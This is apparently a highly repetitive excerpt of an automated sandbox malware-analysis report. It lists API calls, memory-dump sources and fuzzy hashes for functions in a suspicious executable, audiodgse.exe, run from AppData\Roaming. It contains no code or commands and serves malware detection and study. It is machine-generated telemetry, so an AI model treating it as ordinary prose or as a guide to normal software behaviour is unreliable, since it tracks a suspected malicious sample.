                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                  • Instruction ID: 3517892101dd69bd75e64738494877d03a8317e446f0652336487a17687a2cae
                                                  • Opcode Fuzzy Hash: d154c6f6c8b8bff782c781b6862f01632ca8036cc5e59350156e3961b0956316
                                                  • Instruction Fuzzy Hash: 53712571E04229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281D7789996DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                  • Instruction ID: 34c5161cf4e4322df4c522de15ced9ded486b5ca7425d8c28145854c0c0886a7
                                                  • Opcode Fuzzy Hash: 90803f23476dcfb414c0400bb9d8b7cdb0b3ca45f440242c86af8c4d62fdd6e9
                                                  • Instruction Fuzzy Hash: 29714571D04229DBEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 00401BD2
                                                  • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BE4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: Call
                                                  • API String ID: 3394109436-1824292864
                                                  • Opcode ID: 1fe632c829319894c03c4f390d25a6009dfdfdfa543a20855fb3c628d0abeb6c
                                                  • Instruction ID: 90574936f02aea29710b4ee6ae69819f4a98e20e624d26ff257ec3688bf7659d
                                                  • Opcode Fuzzy Hash: 1fe632c829319894c03c4f390d25a6009dfdfdfa543a20855fb3c628d0abeb6c
                                                  • Instruction Fuzzy Hash: 1B21A8B3604106ABCB10EB64DE8495F73E9EB48318B204437F501F32D1D77CA8528B5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004062DD: FindFirstFileA.KERNELBASE(?,00421558,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                    • Part of subcall function 004062DD: FindClose.KERNEL32(00000000), ref: 004062F4
                                                  • lstrlenA.KERNEL32 ref: 004022F2
                                                  • lstrlenA.KERNEL32(00000000), ref: 004022FC
                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                  • Instruction ID: e190a191dd6904399be212acf1c509ba618b837bf102c15a3da6bfbe2c681905
                                                  • Opcode Fuzzy Hash: d2ded405d62ae805881579f4b3fa0f6d32604239724b875ac766ac1e54bcc50d
                                                  • Instruction Fuzzy Hash: E6112A71E04318AACB00EFB98949A8EBBB9EF04318F10407BA405FB2D2D6BCD540CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                  • RegEnumValueA.ADVAPI32 ref: 00402591
                                                  • RegCloseKey.KERNEL32(?), ref: 004025A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                  • Instruction ID: 35fd857a3e442691b1a787247be78dd7b49a46040516f967143c2ea575d22cfd
                                                  • Opcode Fuzzy Hash: 8d3a1cd54caa8d1fdba4ab421f0a15f787f245c239668e29e6e22b939a192df5
                                                  • Instruction Fuzzy Hash: 5801B1B1905204FFE7119F659E89ABF7ABCEB40344F10443EF402B62C0D6B85E019669
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                  • Instruction ID: 8f3c8c2c6778634c6bf67ed2425ae169c6cf17cae75ec7db2a606e7394f4df6a
                                                  • Opcode Fuzzy Hash: b00cdceb79a367ba246cd9f8507522f39a7060d96376a61327adf18ce8985981
                                                  • Instruction Fuzzy Hash: 36118F71905205FEDB11CF64CA5D5AEBAB4AF15344F60447FE042B62C0D2B88A45DB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                  • Instruction ID: 3754a530b6758dc8908f2ef617aa9c280200ea706ec51d0fb7e67c491179f4d9
                                                  • Opcode Fuzzy Hash: 42208f6ee167e53754ec85f902deef064f05172097489c9424a2864a03bb7ea4
                                                  • Instruction Fuzzy Hash: A3012831724210ABE7294B389D04B2A369CE710328F11823BF811F72F1D6B8DC02DB4D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 00402409
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                  • Instruction ID: ce1450a8ab12a7957634bce685e0bfb7e2b45ee5234afc219fd3c41b35330c67
                                                  • Opcode Fuzzy Hash: 1e106540e0c6f3fecb343495f38143b2ac523dee1af81adac6be3cf30664865e
                                                  • Instruction Fuzzy Hash: AAF0F672E04120ABD700AFB89B4DAAE72A89B44304F11017BF202B72C1D5F85E02826E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 004051E3
                                                    • Part of subcall function 004040B4: SendMessageA.USER32 ref: 004040C6
                                                  • OleUninitialize.OLE32 ref: 0040522F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                  • Instruction ID: c8a811e9c9fb5a5b15e00e8e17d8607129a9d45208e9b7412ec8ad736198a790
                                                  • Opcode Fuzzy Hash: 8f85f5a8b917a8e83986f1e9b037d27413aa3264665e42cac53abf952752d631
                                                  • Instruction Fuzzy Hash: 82F0F0F6A00201BBEA606B40A801B1773B0EFD0702F00847EFF44B22E1D63D59028E6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStringslstrcmp
                                                  • String ID:
                                                  • API String ID: 1938659011-0
                                                  • Opcode ID: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                  • Instruction ID: 79d5ad403a5aaaf22ef605bc71de2bbac2c7999a6642915e38ea97ae4a47edd5
                                                  • Opcode Fuzzy Hash: 778fc31b8dd6c980b9d2567d316741ca00daeb01fb42aaa0a4e9e8a2c55b1430
                                                  • Instruction Fuzzy Hash: BAF0A771B09240EBCB21DF759D44A9F7FE8EF91354B10803BE145F6290D2388901CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                  • Instruction ID: ea2ebfb6392eb1d35c1d77cf7a204b1acfca181ccf64587d83a13520139c7bad
                                                  • Opcode Fuzzy Hash: 6c68a4902ab0689787260bc54c5c5f1836fe880f95a3f1419a379d47a79b2dce
                                                  • Instruction Fuzzy Hash: C8E012B2A08210DFD715DFA8AA859AE77B4FB84325F10493BE102F12D1D7B85940965D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F
                                                    • Part of subcall function 00406304: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                    • Part of subcall function 00406304: wsprintfA.USER32 ref: 00406354
                                                    • Part of subcall function 00406304: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                  • Instruction ID: 5c1bd2d9329a739c8a877d318ed38f6c7ac4115b407851283e1fe7e546b0050a
                                                  • Opcode Fuzzy Hash: b4adfc3f0f4b19c213d1a711131d711d9af4f575b66eeead30b066e316f5e6c0
                                                  • Instruction Fuzzy Hash: 85E08C32A08210ABD7106B709D0493B72E89B85700302483EFE0AF2191D738EC21AAA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                  • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                                  • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                                  • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403228,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040564A
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405658
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                  • Instruction ID: fc3bbe6b068c7ca676e2af9f6a434936c7df2cd1c21a2d5f2b74ac8b5b27fed5
                                                  • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                                  • Instruction Fuzzy Hash: 0BC08C30688101AADA002B308D08B073A55AB20340F608836600AE00F0CA32A600DD3F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000), ref: 72BE2AF7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
